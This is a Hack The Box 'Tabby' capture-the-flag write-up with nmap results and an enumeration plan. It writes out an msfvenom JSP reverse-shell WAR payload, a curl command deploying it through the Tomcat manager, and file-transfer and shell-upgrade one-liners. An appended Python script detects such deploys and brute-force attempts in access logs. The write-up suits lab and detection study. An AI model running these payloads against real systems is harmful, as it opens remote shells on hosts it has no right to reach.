Hack The Box — Tabby

nmap -A -T4 10.10.10.194

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
  1. Try to search for exploits in Apache 2.4.41 by using the searchsploit tool
  2. Try to brute-force SSH credentials by using nmap scripts and the brutespray tool
  3. Try to brute-force Tomcat credentials by using Metasploit and nmap scripts
  4. Try to enumerate the websites at 10.10.10.194:80 and 10.10.10.194:8080 and do content discovery by using dirbuster/dirsearch/ffuf/gobuster

1. Public exploitation

2. SSH Credentials

3. Tomcat login credentials brute force

4. Website Enumeration and content discovery

reverse shell payload → msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
deploy your payload → curl --upload-file <path/to/shell.war> "http://megahosting:8080/manager/text/deploy?path=/shell&update=true"
Vulnerable machine > python3 -m http.server 80
Attack machine > wget http://10.10.10.194:80/backup-file-name
python -c 'import pty; pty.spawn("/bin/bash")'
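The deploy step above leaves a clear trace in Tomcat's access log: an authenticated PUT to the manager text interface, usually preceded by a burst of 401s against /manager/html while credentials are guessed. The script below is an added example, not part of this write-up; it parses a few constructed Common Log Format lines (embedded in SAMPLE_LOG, the addresses and timestamps are made up) and reports WAR deployments and failed manager logins per source IP. The endpoint list and the failed-login threshold are assumptions to tune for your own environment.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed Tomcat access-log lines (Common Log Format); not taken from the write-up.
SAMPLE_LOG = """\
10.10.14.7 - - [01/Jul/2020:10:01:02 +0000] "GET / HTTP/1.1" 200 11156
10.10.14.7 - - [01/Jul/2020:10:01:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [01/Jul/2020:10:01:06 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [01/Jul/2020:10:01:07 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [01/Jul/2020:10:01:08 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - tomcat [01/Jul/2020:10:01:40 +0000] "PUT /manager/text/deploy?path=/shell&update=true HTTP/1.1" 200 37
10.10.14.7 - - [01/Jul/2020:10:01:44 +0000] "GET /shell/ HTTP/1.1" 200 0
10.10.10.20 - admin [01/Jul/2020:10:05:00 +0000] "GET /manager/text/list HTTP/1.1" 200 210
"""

# Common Log Format: client ident user [timestamp] "METHOD path proto" status bytes
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Manager text-interface commands that change what is running (assumed watch-list).
DEPLOY_PATHS = ("/manager/text/deploy", "/manager/text/undeploy", "/manager/text/reload")


@dataclass(frozen=True)
class Finding:
    kind: str      # "war_deploy" or "manager_auth_bruteforce"
    source: str    # client IP from the log line
    detail: str


def parse_line(line):
    """Return a dict of the log fields, or None if the line is not CLF."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop ?path=/shell&update=true
    return rec


def analyse(log_text, failed_auth_threshold=3):
    """Flag successful manager deploy commands and per-IP bursts of failed manager logins."""
    findings = []
    failed_auth = Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["path"].startswith(DEPLOY_PATHS) and rec["status"] == 200:
            findings.append(Finding(
                "war_deploy", rec["src"],
                f'{rec["method"]} {rec["path"]} as user {rec["user"]} at {rec["ts"]}'))
        if rec["path"].startswith("/manager/") and rec["status"] == 401:
            failed_auth[rec["src"]] += 1
    for src, n in failed_auth.items():
        if n >= failed_auth_threshold:
            findings.append(Finding("manager_auth_bruteforce", src, f"{n} failed manager logins"))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"[{f.kind}] {f.source}: {f.detail}")
```

Point it at localhost_access_log.*.txt on a real host and the two findings that matter are a deploy from an address that is not your admin network and a 401 burst from the same source just before it; both are reasons to pull the manager-script role from accounts that do not need it and to bind the manager app to trusted addresses only.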

Congrats and Thank you ❤

Eslam Akl, Offensive Security Enthusiast — twitter @eslam3kll